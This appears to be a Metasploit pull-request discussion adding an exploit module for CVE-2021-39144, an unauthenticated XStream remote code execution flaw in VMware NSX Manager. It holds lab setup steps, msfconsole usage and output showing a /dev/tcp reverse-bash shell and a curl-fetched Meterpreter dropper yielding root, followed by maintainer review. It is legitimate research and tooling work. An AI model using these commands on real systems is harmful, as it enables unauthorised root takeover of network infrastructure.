Pre-authenticated Remote Code Execution in VMware NSX Manager using XStream [CVE-2021-39144]

[h00die-gr3y]

VMware Cloud Foundation contains a remote code execution vulnerability via XStream open source library. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.

Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of root on the appliance.

VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13 are vulnerable to Remote Command Injection.

This module has been tested against VMware NSX Manager (NSX-V) with the specifications listed below:

• VMware NSX Manager
• Version 6.4.13
• Version 6.4.4

Verification

Follow these instructions to install a vulnerable VMware NSX Manager on VirtualBox.

• Go to Download VMware NSX for vSphere 6.4.13
• Note: You need to be a customer with valid VMware subscriptions
• Download the ova file VMware-NSX-Manager-6.4.13-19307994.ova
• Open VirtualBox and import the ova file
• After successful import, start the VM and you have a VMware NSX Manager running which is accessible using url https://<nsx-manager-ip>
• Credentials to login: User: admin, password: default
• Use the module and options below to test the vulnerability...

• Start msfconsole
• use exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
• set rhosts <target host ip>
• set lhost <attacker host ip>
• exploit

msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options

Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.100.5    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    443              yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)


msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.5:443 can be exploited !
[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
[*] Executing Unix (In-Memory) with bash -c '0<&44-;exec 44<>/dev/tcp/192.168.100.7/4444;sh <&44 >&44 2>&44'
[*] Command shell session 14 opened (192.168.100.7:4444 -> 192.168.100.5:42512) at 2022-11-05 10:33:37 +0000

pwd
/usr/lib/tanuki/bin
whoami
root
exit
[*] 192.168.100.5 - Command shell session 14 closed.

msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > options

Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.100.5    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT    443              yes       The target port (TCP)
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)
   VHOST                     no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.5:443 can be exploited !
[+] The target appears to be vulnerable. Target is running VMware NSX Manager (NSX-V)
[*] Executing Linux Dropper
[*] Using URL: http://192.168.100.7:8080/G5xrKmpiufcQdCt
[*] Client 192.168.100.5 (curl/7.81.0) requested /G5xrKmpiufcQdCt
[*] Sending payload to 192.168.100.5 (curl/7.81.0)
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Sending stage (3045348 bytes) to 192.168.100.5
[*] Meterpreter session 13 opened (192.168.100.7:4444 -> 192.168.100.5:42384) at 2022-11-05 10:29:30 +0000
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.100.5
OS           : NSX Manager 6.4.13 (Linux 4.9.297)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Limitations

The vulnerability check is limited in detecting that VMWare NSX Manager (NSX-V) is running without obtaining the version information.
However all VMware NSX Manager versions up to 6.4.13 are vulnerable, except for 6.4.14, so most detected targets are likely to be vulnerable.

[jheysel-r7]

Addresses suggestion-module issue: #17198

[cdelafuente-r7]

Thanks for your contribution @h00die-gr3y ! I just left a few minor comments for you to review when you get a chance.

I don't have a valid VMware subscription and couldn't download the software to test your module. Would you mind recording a PCAP (with Wireshark or similar) and send it to us at msfdev [at] metasploit.com? Please, also include the msfconsole output with the option HttpTrace set to true. Thanks!

[h00die-gr3y]

Thanks for your contribution @h00die-gr3y ! I just left a few minor comments for you to review when you get a chance.

I don't have a valid VMware subscription and couldn't download the software to test your module. Would you mind recording a PCAP (with Wireshark or similar) and send it to us at msfdev [at] metasploit.com? Please, also include the msfconsole output with the option HttpTrace set to true. Thanks!

PCAP and HttpTrace has been sent !

[cdelafuente-r7]

Thank you for the files you sent @h00die-gr3y! I reviewed the console output/PCAP and everything looks good to me. I'll go ahead and land it.

[cdelafuente-r7]

Release Notes

This adds an exploit module that leverages a Remote Command Injection vulnerability in VMware Cloud Foundation 3.x and NSX Manager Data Center for vSphere up to and including version 6.4.13. This vulnerability is identified as CVE-2021-39144.

[h00die-gr3y]

Thanks guys ! Pleasure working with you all again...